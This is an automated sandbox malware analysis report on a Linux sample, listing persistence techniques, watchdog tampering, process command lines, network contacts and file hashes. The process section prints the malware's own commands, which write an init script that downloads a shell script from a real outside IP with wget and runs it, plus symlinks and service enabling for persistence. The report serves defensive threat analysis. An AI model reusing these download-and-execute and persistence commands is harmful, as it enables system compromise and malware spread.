Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-k9ghrazjet
Target 20073737305.zip
SHA256 4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357

Threat Level: Shows suspicious behavior

The file 20073737305.zip was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

File and Directory Permissions Modification

Modifies Watchdog functionality

Checks mountinfo of local process

Creates/modifies environment variables

Modifies rc script

Modifies init.d

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:17

Reported

2024-11-25 09:20

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

148s

Max time network

131s

Command Line

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /dev/misc/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1669/mountinfo /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1/cgroup /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/filesystems /usr/bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/1674/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Processes

/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
RU 193.143.1.70:38242 tcp
FR 185.189.172.62:23 tcp
US 33.246.150.241:23 tcp
KR 14.60.11.211:23 tcp
BR 191.62.222.55:23 tcp
JP 222.8.115.247:23 tcp
TR 88.249.88.188:23 tcp
US 138.9.138.156:23 tcp
BR 191.38.30.89:23 tcp
CN 106.42.130.194:23 tcp
US 215.46.155.156:23 tcp
TW 60.249.124.58:23 tcp
RO 89.122.114.144:23 tcp
GH 45.211.215.90:23 tcp
US 38.112.237.232:23 tcp
US 29.184.170.230:23 tcp
KR 110.93.130.26:23 tcp
MU 196.53.198.29:23 tcp
US 173.48.110.246:23 tcp
US 26.255.215.101:23 tcp
US 152.190.197.88:23 tcp
US 6.2.129.20:23 tcp
CA 199.43.249.229:23 tcp
KR 183.109.180.25:23 tcp
BY 178.125.95.234:23 tcp
BR 177.64.115.140:23 tcp
RU 188.243.24.194:23 tcp
US 216.147.80.167:23 tcp
CA 138.73.44.190:23 tcp
US 114.57.100.230:23 tcp
US 162.79.222.154:23 tcp
US 56.150.149.54:23 tcp
US 9.21.164.86:23 tcp
FR 109.211.36.197:23 tcp
FR 89.185.163.38:23 tcp
JP 157.73.144.184:23 tcp
DE 84.169.19.201:23 tcp
US 170.215.228.120:23 tcp
SE 193.15.253.49:23 tcp
US 63.242.27.64:23 tcp
US 50.138.148.107:23 tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5